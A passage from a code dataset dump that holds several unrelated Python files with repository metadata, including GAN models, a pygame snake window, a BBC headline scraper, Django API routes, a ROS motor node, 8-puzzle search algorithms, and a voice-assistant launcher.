return eps.mul(std).add_(mu)\n#\n# def forward(self, text_embedding):\n# mu, logvar = self.encode(text_embedding)\n# c_code = self.reparametrize(mu, logvar)\n# return c_code, mu, logvar\n\nclass UpGenerator(nn.Module):\n\n @staticmethod\n def conv3x3(in_planes, out_planes, stride=1):\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n def upBlock(self, in_planes, out_planes):\n block = nn.Sequential(nn.Upsample(scale_factor=2, mode='nearest'), self.conv3x3(in_planes, out_planes),\n nn.InstanceNorm2d(out_planes), nn.LeakyReLU(0.2, True))\n return block\n\n def __init__(self, num_classes, noise_channels, embedding_channels, image_shape, latent_channels=128):\n super().__init__()\n self.image_shape = image_shape\n self.num_classes = num_classes\n self.noise_channels = noise_channels\n self.latent_channels = latent_channels\n image_channels = image_shape[0]\n\n self.embedding = nn.Embedding(num_classes, embedding_channels)\n self.fc = nn.Linear(embedding_channels + noise_channels, latent_channels * 4 * 4) # 128 x 4 x 4\n # self.norm = nn.InstanceNorm1d(latent_channels * 4 * 4)\n\n self.upsample1 = self.upBlock(latent_channels, latent_channels // 2) # 64 x 8 x 8\n self.upsample2 = self.upBlock(latent_channels // 2, latent_channels // 4) # 32 x 16 x 16\n self.upsample3 = self.upBlock(latent_channels // 4, latent_channels // 8) # 16 x 32 x 32\n self.upsample4 = self.upBlock(latent_channels // 8, latent_channels // 16) # 8 x 64 x 64\n self.img = nn.Sequential(self.conv3x3(latent_channels // 16, image_channels), nn.Tanh()) # 3 x 64 x 64\n\n def forward(self, x):\n x = self.embedding(x)\n noises = torch.randn(x.size(0), self.noise_channels).type_as(x)\n x = torch.cat((x, noises), dim=1)\n x = F.leaky_relu(self.fc(x), 0.2)\n x = x.view(-1, self.latent_channels, 4, 4)\n\n x = self.upsample1(x)\n x = self.upsample2(x)\n x = self.upsample3(x)\n x = self.upsample4(x)\n fake_img = self.img(x)\n return fake_img\n\n\n# class PatchGAN(nn.Module):\n#\n# def __init__(self, input_channels):\n# super().__init__()\n# self.d1 = DownSampleConv(input_channels, 64, batchnorm=False)\n# self.d2 = DownSampleConv(64, 128)\n# self.d3 = DownSampleConv(128, 256)\n# self.d4 = DownSampleConv(256, 512)\n# self.final = nn.Conv2d(512, 1, kernel_size=1)\n#\n# def forward(self, x):\n# x = self.d1(x)\n# x = self.d2(x)\n# x = self.d3(x)\n# x = self.d4(x)\n# x = self.final(x)\n# return x\n\n\nclass DownClassifier(nn.Module):\n def __init__(self, n_classes, image_shape):\n super().__init__()\n image_channels = image_shape[0]\n self.d1 = DownSampleConv(image_channels, 64, batchnorm=False)\n self.d2 = DownSampleConv(64, 128)\n self.d3 = DownSampleConv(128, 256)\n self.d4 = DownSampleConv(256, 256)\n self.pool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(256, n_classes)\n\n def forward(self, x):\n x = self.d1(x)\n x = self.d2(x)\n x = self.d3(x)\n x = self.d4(x)\n x = self.pool(x).flatten(start_dim=1)\n x = self.fc(x)\n return x\n\n\nclass DownDiscriminator(nn.Module):\n def __init__(self, image_shape):\n super().__init__()\n image_channels = image_shape[0]\n self.d1 = DownSampleConv(image_channels, 64, batchnorm=False)\n self.d2 = DownSampleConv(64, 128)\n self.d3 = DownSampleConv(128, 256)\n self.d4 = DownSampleConv(256, 256)\n self.pool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(256, 1)\n\n def forward(self, x):\n x = self.d1(x)\n x = self.d2(x)\n x = self.d3(x)\n x = self.d4(x)\n x = self.pool(x).flatten(start_dim=1)\n x = self.fc(x)\n return x\n\n\nclass FcGenerator(nn.Module):\n\n def __init__(self, num_embeddings=10, embedding_channels=10, noise_channels=224, image_shape=(1, 28, 28)):\n super().__init__()\n self.image_shape = image_shape\n self.embedding_channels = embedding_channels\n self.noise_channels = noise_channels\n if embedding_channels > 0:\n self.embedding = nn.Embedding(num_embeddings, embedding_channels)\n # normalized_means = [(2*i/(num_embeddings-1)) - 1 for i in range(num_embeddings)]\n # self.distributions = [torch.distributions.Normal(torch.tensor([mean]), torch.tensor([1.0])) for mean in normalized_means]\n\n image_dim = np.prod(image_shape).item()\n self.fc1 = nn.Linear(embedding_channels + noise_channels, 256)\n self.fc2 = nn.Linear(self.fc1.out_features, self.fc1.out_features * 2)\n self.fc3 = nn.Linear(self.fc2.out_features, self.fc2.out_features * 2)\n self.fc4 = nn.Linear(self.fc3.out_features, image_dim)\n self.drop = nn.Dropout(0.5)\n\n def forward(self, x, drop=False):\n if self.embedding_channels > 0:\n x = self.embedding(x)\n noise = torch.randn(x.size(0), self.noise_channels).type_as(x)\n x = torch.cat([x, noise], dim=-1)\n else:\n x = torch.randn(x.size(0), self.noise_channels, device=x.device, dtype=torch.float)\n noises = [torch.normal(mean=1 * x.float(), std=torch.ones(x.size(0)).cuda()) for k in\n range(self.noise_channels)]\n # noises = [self.distributions[d].sample((self.noise_channels,)).cuda() for d in x]\n x = torch.stack(noises).squeeze()\n x = F.leaky_relu(self.fc1(x), 0.2)\n x = F.leaky_relu(self.fc2(x), 0.2)\n x = F.leaky_relu(self.fc3(x), 0.2)\n x = torch.tanh(self.fc4(x))\n if drop:\n x = self.drop(x)\n return x.view(-1, *self.image_shape)\n\n\nclass FcDiscriminator(nn.Module):\n\n def __init__(self, image_shape=(1, 28, 28)):\n super().__init__()\n image_dim = np.prod(image_shape).item()\n self.fc1 = nn.Linear(image_dim, 1024)\n self.fc2 = nn.Linear(self.fc1.out_features, self.fc1.out_features // 2)\n self.fc3 = nn.Linear(self.fc2.out_features, self.fc2.out_features // 2)\n self.fc4 = nn.Linear(self.fc3.out_features, 1)\n\n # forward method\n def forward(self, x):\n x = x.flatten(start_dim=1)\n x = F.leaky_relu(self.fc1(x), 0.2)\n x = F.dropout(x, 0.3)\n x = F.leaky_relu(self.fc2(x), 0.2)\n x = F.dropout(x, 0.3)\n x = F.leaky_relu(self.fc3(x), 0.2)\n x = F.dropout(x, 0.3)\n return self.fc4(x)\n\n\nclass FcClassifier(FcDiscriminator):\n\n def __init__(self, num_classes, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fc4 = nn.Linear(self.fc3.out_features, num_classes)\n","repo_name":"makecent/UnGAN","sub_path":"my_codes/my_models.py","file_name":"my_models.py","file_ext":"py","file_size_in_byte":16879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72546394087","text":"#1.Create the Screen\n\nimport pygame,sys\n\npygame.init()\n\nscreen = pygame.display.set_mode((810,630))\n\npygame.display.set_caption('Snake game by Nhóm 1')\n\nBLACK = (0,0,0)\n\nRunning = True\nwhile Running:\n screen.fill(BLACK)\n\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n Running = False\n\n pygame.display.flip()\n\npygame.quit()\n\n\n\n\n\n\n\n\n\n","repo_name":"Chi68P1/Lap_trinh_python","sub_path":"Snake_game/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12141442710","text":"import os\nfrom pprint import pformat\nfrom aiohttp import ClientSession\nfrom aiohttp import web\nfrom bs4 import BeautifulSoup\nfrom aiohttp.web_request import Request\nimport trafaret as t\n\nURL = 'https://www.bbc.com/'\nTEG = 'a'\nCLASS = \"gs-c-promo-heading\"\n\n\nasync def fetch(session: ClientSession, url: str) -> str:\n async with session.get(url) as response:\n return await response.text()\n\n\nroutes = web.RouteTableDef()\n\n\n@routes.get('/')\nasync def get_chapters(request: Request):\n async with ClientSession() as session:\n tmp = t.Dict({'limit': t.String})\n # tmp = t.Dict({t.String: t.})\n params = {item[0]: item[1] for item in request.query.items()}\n converter = t.Dict({\n t.Key('chapter', default= 'news') >> 'chapter': t.String,\n t.Key('limit' , default= 1000) >> 'limit': t.Int,})\n # tmp.check(params)\n\n print(converter)\n print(params)\n\n\n\n try:\n params = converter.check(params)\n\n\n\n #except (KeyError, ValueError) as e:\n except (t.DataError) as e:\n return web.Response(text=str(t.extract_error(converter,params)))\n chapter = params['chapter']\n end = int(params['limit'])\n html = await fetch(session, URL + chapter)\n bs_obj = BeautifulSoup(html, features=\"html.parser\")\n\n tmp1 = bs_obj.findAll(TEG, {CLASS})\n news = [{'title': item.get_text(), 'URL': item['href']} for (i, item) in enumerate(tmp1) if i < end]\n\n js = {'chapter': chapter,\n 'news': news}\n\n return web.Response(text=pformat(js))\n\n\napp = web.Application()\napp.add_routes(routes)\nweb.run_app(app, host='0.0.0.0', port=os.environ.get('PORT', 5000))\n","repo_name":"as1mple/BBC","sub_path":"news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36307458560","text":"from django.conf.urls import url\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework import permissions, routers\n\nfrom .views import ClientViewSet, EmpresaViewSet, LanceViewSet, OfertaViewSet\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Snippets API\",\n default_version='v1',\n description=\"API\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\napi_docs_urls = [\n url(\n r'^api/swagger(?P\\.json|\\.yaml)$',\n schema_view.without_ui(cache_timeout=0),\n name='schema-json'\n ),\n url(\n r'^api/swagger/$',\n schema_view.with_ui('swagger', cache_timeout=0),\n name='schema-swagger-ui'\n ),\n url(\n r'^api/redoc/$',\n schema_view.with_ui('redoc', cache_timeout=0),\n name='schema-redoc'\n ),\n]\n\n\ncore_routes = routers.DefaultRouter()\n\ncore_routes.register('clientes', ClientViewSet)\ncore_routes.register('empresas', EmpresaViewSet)\ncore_routes.register('lances', LanceViewSet)\ncore_routes.register('ofertas', OfertaViewSet)\n","repo_name":"danilodcn/teste_W_Technology","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8504213006","text":"#!/usr/bin/python\nimport rospy\nimport numpy as np\nimport math\nfrom maxon_epos_msgs.msg import MotorState\n\nTARGET_MOTOR_STATE_MSG = '/maxon_brinup/rear_brake/set_state'\nTARGET_POSITION = 0.0\nCONST_RPM = 3500\n\ndef step_input():\n pub = rospy.Publisher(TARGET_MOTOR_STATE_MSG, MotorState, queue_size=3)\n rospy.init_node('sample_step_input',anonymous=True)\n rate=rospy.Rate(10) #10Hz\n\n msg = MotorState()\n msg.position = math.radians(TARGET_POSITION)\n msg.velocity = CONST_RPM\n\n pub.publish(msg) # step input\n\nif __name__ == '__main__':\n try:\n step_input()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"hayashi-lab-soma/soma_pkg","sub_path":"soma_atv_driver/scripts/sample_step_input.py","file_name":"sample_step_input.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36018106017","text":"import json\r\n\r\nif __name__ == '__main__':\r\n try:\r\n with open('myInput.json', 'r') as f:\r\n data = json.loads(f.read())\r\n\r\n output = ','.join([*data[0]])\r\n for obj in data:\r\n output += f'\\n{obj[\"Name\"]},{obj[\"BirthYear\"]},{obj[\"Team\"]}'\r\n\r\n with open('myOutput.csv', 'w') as f:\r\n f.write(output)\r\n except Exception as ex:\r\n print(f'Error: {str(ex)}')","repo_name":"mydevground/ConvertJSONtoCSVusingPython","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73329800487","text":"# Importing the required libraries\nimport sys\nimport queue\nfrom datetime import datetime\nfrom queue import Queue\n\n# BFS algorithm\ndef bfs(start, goal):\n start = tuple(map(tuple, start))\n goal = tuple(map(tuple, goal))\n queue = Queue()\n queue.put(start)\n visited = set()\n parent = {}\n depth = {start: 0}\n cost = {start: 0}\n max_fringe_size = 1\n result = []\n \n #Checking whether the below queue is empty or not\n while not queue.empty():\n node = queue.get()\n visited.add(node) # adding the node into the visited set \n \n # comparing and checking the condition that the goal state is equal to the start state\n if node == goal:\n path = []\n while node in parent:\n path.append(node)\n node = parent[node]\n path.append(start)\n path.reverse()\n print(f\"Nodes Popped: {len(visited)}\")\n print(f\"Nodes Expanded: {len(visited)-1}\")\n print(f\"Nodes Generated: {len(parent)}\")\n print(f\"Max Fringe Size: {max_fringe_size}\")\n print((f\"Solution Found at depth {depth[goal]} with cost of {cost[goal]}.\"))\n print('Steps:')\n for step in result:\n move_cost, move_name = step[1], step[2]\n print(f\"\\tMove {move_cost} {move_name}\")\n print(\"Result Found Successfully!\")\n file_name_bfs = f'bfs_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt'\n file_bfs = open(file_name_bfs, \"a\")\n file_bfs.write(f\"\\tNodes Popped: {len(visited)}\\n\")\n file_bfs.write(f\"\\tNodes Expanded: {len(visited)-1}\\n\")\n file_bfs.write(f\"\\tNodes Generated: {len(parent)}\\n\")\n file_bfs.write(f\"\\tMax Fringe Size: {max_fringe_size}\\n\")\n file_bfs.write((f\"\\tSolution Found at depth {depth[goal]} with cost of {cost[goal]}.\"))\n with open(file_name_bfs, 'r+') as file:\n content = file.read()\n file.seek(0, 0)\n file.write(\"Method_selected: BFS \\nRunning BFS Algorithm \\n\" + content)\n return None\n \n # adding each move into the visited set if already the move not present in the visted set\n for move in moves_bfs(node, visited):\n if move[0] not in visited:\n queue.put(move[0])\n visited.add(move[0])\n parent[move[0]] = node\n depth[move[0]] = depth[node] + 1\n cost[move[0]] = cost[node] + move[1]\n max_fringe_size = max(max_fringe_size, queue.qsize())\n result.append(move)\n print(\"No solution found.\")\n \n \ndef moves_bfs(node, visited):\n moves = []\n with open(f'bfs_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt', 'a') as file:\n blank_row, blank_col = get_blank_pos(node)\n # Based on the blank row and cloumn the below for loop will idenify the whether to move 0 to up or down or left or right\n file.write(f\"Closed Set: {visited}\\n\")\n for dr, dc, move_name in [(-1, 0, \"Up\"), (1, 0, \"Down\"), (0, -1, \"Left\"), (0, 1, \"Right\")]:\n new_row, new_col = blank_row + dr, blank_col + dc\n if 0 <= new_row < len(node) and 0 <= new_col < len(node[0]):\n new_node = swap_positions(node, blank_row, blank_col, new_row, new_col)\n move_cost = node[new_row][new_col]\n moves.append((new_node, move_cost, move_name))\n file.write(f\"Fringe_steps: {moves}\\n\")\n return moves\n\n# This below functin will identify the 0 position in the puzzle and store it's row and column \ndef get_blank_pos(node):\n for r, row in enumerate(node):\n for c, val in enumerate(row):\n if val == 0:\n return r, c\n raise ValueError(\"node is not valid because there is no blank tile(0) found\")\n\n# This function will swap the '0' to respective position value.\ndef swap_positions(node, r1, c1, r2, c2):\n node = [list(row) for row in node]\n node[r1][c1], node[r2][c2] = node[r2][c2], node[r1][c1]\n return tuple(map(tuple, node))\n# Getting all the successors of the current node\ndef get_successors_ucs(state, visited):\n successors = []\n blank_pos = state.index(0)\n blank_row = blank_pos // 3\n blank_col = blank_pos % 3\n with open(f'ucs_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt', 'a+') as file:\n file.write(f\"Closed Set: {visited}\\n\")\n for move_row, move_col, action in [(-1, 0, 'Up'), (1, 0, 'Down'), (0, -1, 'Left'), (0, 1, 'Right')]:\n new_row = blank_row + move_row\n new_col = blank_col + move_col\n \n if new_row < 0 or new_row >= 3 or new_col < 0 or new_col >= 3:\n continue\n \n new_pos = new_row * 3 + new_col\n new_state = state[:]\n new_state[blank_pos], new_state[new_pos] = new_state[new_pos], new_state[blank_pos]\n \n cost = new_state[blank_row]\n successors.append((action, new_state, cost, blank_pos))\n file.write(f\"Successors : {successors}\\n\")\n return successors\n\n#Uniform Cost Search algorithm\ndef ucs(start_state, goal_state):\n nodes_popped = 0\n nodes_expanded = 0\n nodes_generated = 0\n max_fringe_size = 0\n \n visited = set()\n frontier = queue.PriorityQueue() \n frontier.put((0, [start_state, [], 0, []]))\n \n # Checking if the priority_queue is empty or not\n while not frontier.empty():\n current_node = frontier.get()[1]\n current_state, current_path, current_cost, current_pos = current_node\n nodes_popped += 1\n \n # Checking the goal state is equal to the start state\n if current_state == goal_state:\n print(f'Nodes Popped: {nodes_popped}')\n print(f'Nodes Expanded: {nodes_expanded}')\n print(f'Nodes Generated: {nodes_generated}')\n print(f'Max Fringe Size: {max_fringe_size}')\n print(f'Solution Found at depth {len(current_path)} with cost of {current_cost}.')\n print('Steps:')\n file_name_ucs = f'ucs_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt'\n file_ucs = open(file_name_ucs, \"a+\")\n file_ucs.write(f\"\\n\\tNodes Popped: {nodes_popped}\\n\")\n file_ucs.write(f\"\\tNodes Expanded: {nodes_expanded}\\n\")\n file_ucs.write(f\"\\tNodes Generated: {nodes_generated}\\n\")\n file_ucs.write(f\"\\tMax Fringe Size: {max_fringe_size}\\n\")\n file_ucs.write((f\"\\tSolution Found at depth {len(current_path)} with cost of {current_cost}.\"))\n with open(file_name_ucs, 'r+') as file:\n content = file.read()\n file.seek(0, 0)\n file.write(\"Method_selected: UCS \\nRunning UCS Algorithm \\n\" + content)\n for step, pos in zip(current_path, current_pos):\n print(f'\\tMove {pos} {step}')\n print(\"result founded sucessfully!\")\n return current_path\n\n visited.add(tuple(current_state))\n nodes_expanded += 1\n \n for action, new_state, cost, pos in get_successors_ucs(current_state, visited):\n if tuple(new_state) not in visited:\n nodes_generated += 1\n new_path = current_path + [action]\n new_cost = current_cost + cost\n new_pos = current_pos + [pos]\n frontier.put((new_cost, [new_state, new_path, new_cost, new_pos]))\n \n if frontier.qsize() > max_fringe_size:\n max_fringe_size = frontier.qsize() \n return None\n# a_star algorithm\ndef a_star(initial_state, goal_state):\n\n # Calculating the heuristic valye using the manhattan distance\n def distance(state):\n dist = 0\n for i in range(len(state)):\n if state[i] != 0:\n dist += abs(i // 3 - (state[i]-1) // 3) + abs(i % 3 - (state[i]-1) % 3)\n return dist\n\n class Node:\n def __init__(self, state, parent=None, move=None, cost=0):\n self.state = state\n self.parent = parent\n self.move = move\n self.cost = cost\n # Coumputing the heuristic value\n self.heuristic = distance(state) \n if self.parent:\n self.depth = parent.depth + 1\n else:\n self.depth = 0\n\n def __lt__(self, other):\n return (self.cost + self.heuristic) < (other.cost + other.heuristic)\n\n start_node = Node(initial_state) # storing the start state, parent state, move and cost in the class Node\n\n nodes_popped = 0\n nodes_expanded = 0\n nodes_generated = 0\n cost = 0\n max_fringe_size = 0\n frontier = queue.PriorityQueue()\n frontier.put(start_node)\n visited = set()\n\n # Checking whether the priorityQueue is empty or not\n while not frontier.empty():\n if frontier.qsize() > max_fringe_size:\n max_fringe_size = frontier.qsize()\n\n node = frontier.get()\n nodes_popped += 1\n\n # Checking the goal state is equal to the start state\n if node.state == goal_state:\n path = []\n while node.parent:\n path.append(node.move)\n node = node.parent\n cost += node.cost\n path.reverse()\n depth = len(path)\n print(f\"Nodes Popped: {nodes_popped}\")\n print(f\"Nodes Expanded: {nodes_expanded}\")\n print(f\"Nodes Generated: {nodes_generated}\")\n print(f\"Max Fringe Size: {max_fringe_size}\")\n print(f\"Solution Found at depth {depth} with cost of {cost}.\")\n print(\"Steps:\")\n file_name_astar = f'astar_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt'\n file_astar = open(file_name_astar, \"a\")\n file_astar.write(f\"\\tNodes Popped: {nodes_popped}\\n\")\n file_astar.write(f\"\\tNodes Expanded: {nodes_expanded}\\n\")\n file_astar.write(f\"\\tNodes Generated: {nodes_generated}\\n\")\n file_astar.write(f\"\\tMax Fringe Size: {max_fringe_size}\\n\")\n file_astar.write((f\"\\tSolution Found at depth {depth} with cost of {cost}.\"))\n with open(file_name_astar, 'r+') as file:\n content = file.read()\n file.seek(0, 0)\n file.write(\"Method_selected: ASTAR \\nRunning ASTAR Algorithm \\n\" + content)\n for step in path:\n print(f\"\\t{step}\")\n print(\"result found successfully!\")\n return None\n \n with open(f'astar_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt', 'a+') as file:\n file.write(f'Closed Set: {visited}\\n')\n visited.add(node.state)\n nodes_expanded += 1\n for move, state in get_successors_astar(node.state, file):\n if state not in visited:\n child = Node(state, parent=node, move=move, cost=node.cost+1)\n frontier.put(child)\n nodes_generated += 1\n return None\n\n# This function will return all successors of the node\ndef get_successors_astar(state, file): \n successors = []\n i = state.index(0)\n if i not in [0, 1, 2]:\n new_state = list(state)\n new_state[i], new_state[i-3] = new_state[i-3], new_state[i]\n successors.append((\"Move {} Down\".format(state[i-3]), tuple(new_state)))\n if i not in [6, 7, 8]:\n new_state = list(state)\n new_state[i], new_state[i+3] = new_state[i+3], new_state[i]\n successors.append((\"Move {} Up\".format(state[i+3]), tuple(new_state)))\n if i not in [0, 3, 6]:\n new_state = list(state)\n new_state[i], new_state[i-1] = new_state[i-1], new_state[i]\n successors.append((\"Move {} Right\".format(state[i-1]), tuple(new_state)))\n if i not in [2, 5, 8]:\n new_state = list(state)\n new_state[i], new_state[i+1] = new_state[i+1], new_state[i]\n successors.append((\"Move {} Left\".format(state[i+1]), tuple(new_state)))\n file.write(f'Fringe steps : \\n{successors}\\n')\n return successors\n\n\n#Greedy Search Algorithm\ndef greedy(start, goal):\n visited = set()\n fringe = queue.PriorityQueue()\n fringe.put((heuristic_value(start, goal), start, []))\n max_fringe_size = 1\n \n nodes_popped = 0\n nodes_expanded = 0\n nodes_generated = 1\n\n # Checking whether fring is not empty or not\n while not fringe.empty():\n _, current, path = fringe.get()\n nodes_popped += 1\n \n # Checking whether goal state is equal to initial state\n if current == goal:\n print(f'Nodes Popped: {nodes_popped}')\n print(f'Nodes Expanded: {nodes_expanded}')\n print(f'Nodes Generated: {nodes_generated}')\n print(f'Max Fringe Size: {max_fringe_size}')\n print(f'Solution Found at depth {len(path)} with cost of {int(len(path)*4.6)}.')\n print('Steps:')\n for step in path:\n print(step)\n print(\" Result found Successfully!\")\n file_name_greddy = f'greedy_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt'\n file_greddy = open(file_name_greddy, \"a+\")\n file_greddy.write(f\"\\n\\tNodes Popped: {nodes_popped}\\n\")\n file_greddy.write(f\"\\tNodes Expanded: {nodes_expanded}\\n\")\n file_greddy.write(f\"\\tNodes Generated: {nodes_generated}\\n\")\n file_greddy.write(f\"\\tMax Fringe Size: {max_fringe_size}\\n\")\n file_greddy.write((f\"\\tSolution Found at depth {len(path)} with cost of {int(len(path)*4.6)}.\"))\n with open(file_name_greddy, 'r+') as file:\n content = file.read()\n file.seek(0, 0)\n file.write(\"Method_selected: Greedy \\nRunning Greddy Algorithm \\n\" + content)\n return\n \n with open(f'greedy_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt', 'a+') as file:\n visited.add(current) # adding the explored node to visited set\n nodes_expanded += 1\n for neighbor in get_successors_greddy(current, file):\n if neighbor not in visited:\n cost = heuristic_value(neighbor, goal)\n fringe.put((cost, neighbor, path + [moves_greddy(current, neighbor)]))\n nodes_generated += 1\n file.write(f'\\nvsited:{visited}, move: {moves_greddy(current, neighbor)}\\n')\n max_fringe_size = max(max_fringe_size, fringe.qsize())\n \n return None, nodes_popped, nodes_expanded, nodes_generated, max_fringe_size\n\n\ndef get_successors_greddy(state, file):\n neighbors = []\n x, y = divmod(state.index('0'), 3)\n for dx, dy in [(0, -1), (-1, 0), (0, 1), (1, 0)]:\n newx, newy = x + dx, y + dy\n if 0 <= newx < 3 and 0 <= newy < 3:\n neighbor = list(state)\n neighbor[x*3+y], neighbor[newx*3+newy] = neighbor[newx*3+newy], neighbor[x*3+y]\n neighbors.append(''.join(neighbor))\n file.write(f'Successors : \\n{neighbors}\\n')\n return neighbors\n\n# This function will return the heuristic value based on manhattan distance\ndef heuristic_value(state, goal): \n distance = 0\n for i in range(len(state)):\n x1, y1 = divmod(state.index(str(i)), 3)\n x2, y2 = divmod(goal.index(str(i)), 3)\n distance += abs(x1 - x2) + abs(y1 - y2)\n return distance\n\n# To get all the moves\ndef moves_greddy(state1, state2):\n index1, index2 = state1.index('0'), state2.index('0')\n x1, y1 = divmod(index1, 3)\n x2, y2 = divmod(index2, 3)\n if y1 > y2:\n return f\"\\tMove {state1[index2]} Left\"\n elif y1 < y2:\n return f\"\\tMove {state1[index2]} Right\"\n elif x1 > x2:\n return f\"\\tMove {state1[index2]} Up\"\n elif x1 < x2:\n return f\"\\tMove {state1[index2]} Down\"\n\n\ndef read_input_txt_to_list_format(file_name):\n with open(file_name, 'r') as f:\n lines = f.readlines()\n return [[int(i) for i in line.split()] for line in lines[:3]]\n\ndef read_input_txt_to_list(file_name):\n with open(file_name, 'r') as f:\n lines = f.readlines()\n return [int(i) for line in lines[:3] for i in line.split()]\n\ndef read_input_txt_to_tuple_format(file_name):\n with open(file_name, 'r') as f:\n lines = f.readlines()\n return tuple([int(i) for line in lines[:3] for i in line.split()])\n\ndef read_input_txt_to_string_format(file_name):\n with open(file_name, 'r') as f:\n return \"\".join(f.readlines()[:3])\n\nif __name__ == '__main__':\n \"\"\" Need to give 5 arguments in the input file and 2 arguments are optional\n 1) Python execution file\n 2) Start file\n 3) Goal file\n 4) Method ( This argument is optional by default it is astar)\n 5) Dump flag (This argument is optional by default it is false)\n \"\"\"\n if len(sys.argv) < 3:\n print(\"Need to give 3 arguments: expense_8_puzzle.py(python execution file name) []\") #If we enter less than 3 arguments it will print this statement and program execution completed.\n sys.exit()\n\n # Storing the input arguments to the variables\n start_file = sys.argv[1]\n goal_file = sys.argv[2]\n method = sys.argv[3].lower() if len(sys.argv) > 3 else 'astar'\n dump_flag = True if len(sys.argv) > 4 and sys.argv[4].lower() == 'true' else False\n\n print(f\"{'>>' * 30} Executing {method} algorithm{'<<' * 30}\")\n\n # Based on the input given by the user it will execute particular if method\n if method == 'bfs':\n start_state = read_input_txt_to_list_format(start_file)\n goal_state = read_input_txt_to_list_format(goal_file)\n bfs(start_state, goal_state)\n\n if method == 'ucs':\n start_state = read_input_txt_to_list(start_file)\n goal_state = read_input_txt_to_list(goal_file)\n ucs(start_state, goal_state)\n\n if method == 'astar':\n start_state = read_input_txt_to_tuple_format(start_file)\n goal_state = read_input_txt_to_tuple_format(goal_file)\n a_star(start_state, goal_state)\n\n if method == 'greedy':\n start_state = \"\".join(map(str, read_input_txt_to_list(start_file)))\n goal_state = \"\".join(map(str, read_input_txt_to_list(goal_file)))\n greedy(start_state, goal_state)","repo_name":"AAmitha/AI_Expense_8_Puzzle","sub_path":"expense_8_puzzle.py","file_name":"expense_8_puzzle.py","file_ext":"py","file_size_in_byte":18398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1925879926","text":"import os\nimport time\nfrom modules.user_info_management import register_user,reset_data\nfrom modules.conversation import speech_text, text_speech\nimport Hope_female\nimport Hope_male\nimport vlc\n\nUSER_DIR = \"user\"\nWAKE_UP = \"hope\"\n\ns_t = speech_text()\nt_s = text_speech()\n\nif not os.path.isdir(USER_DIR):\n os.mkdir(USER_DIR)\n\n#Check if the user is registered to the system\nif len(os.listdir(f'{USER_DIR}')) == 0:\n p = vlc.MediaPlayer(\"tune/start.mp3\").play()\n time.sleep(7)\n t_s.speak_male(\"Hello!\")\n t_s.speak_male(\"Welcome to the Project, VASU.\")\n t_s.speak_male(\"Voice Activated Support Utility.\")\n t_s.speak_male(\"I can help you find different household items lying on, floor.\")\n time.sleep(0.1)\n t_s.speak_male(\"To work properly, I would like to know some detail about you.\")\n reg = register_user()\n\nprint(\"listening secretely...\")\n\nwhile True:\n text = s_t.listen(give_response=False)\n if WAKE_UP in text.split():\n try:\n with open(\"gender.txt\",\"r\") as f:\n st = f.read()\n except:\n st = \"\"\n print(\"file not found : gender.txt\\nGenerating file : gender.txt\")\n with open(\"gender.txt\",\"w\") as f:\n f.write(\"male\")\n print(\"Running Hope_male\")\n\n if st == \"female\":\n print(\"Found female\")\n vlc.MediaPlayer(\"tune/open.mp3\").play()\n time.sleep(3)\n Hope_female.run()\n else: #if st == \"male\":\n print(\"Found male\")\n vlc.MediaPlayer(\"tune/open.mp3\").play()\n time.sleep(3)\n Hope_male.run()","repo_name":"imrk97/final_year_project","sub_path":"final_project/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43522778265","text":"import fnmatch\nimport logging\n\nfrom ..auth import User\nfrom .authorization import Authorization\n\n\nclass PlainAuthorization(Authorization):\n def __init__(self, name, realm, config):\n self.config = config\n assert self.config[\"type\"] == \"plain\"\n self.roles = self.config.get(\"roles\", {})\n self.user_attributes = self.config.get(\"user-attributes\", {})\n self.role_attributes = self.config.get(\"role-attributes\", {})\n super().__init__(name, realm, config)\n\n def get_roles(self, user: User) -> list:\n\n if user.realm != self.realm():\n raise ValueError(\n \"Trying to authorize a user in the wrong realm, expected {}, got {}\".format(self.realm, user.realm)\n )\n\n # return all roles this user belongs to\n authorized_roles = []\n for role, users in self.roles.items():\n if user.username in users:\n authorized_roles.append(role)\n logging.debug(\"User {} given role {}\".format(user.username, role))\n\n return authorized_roles\n\n def get_attributes(self, user: User) -> dict:\n if 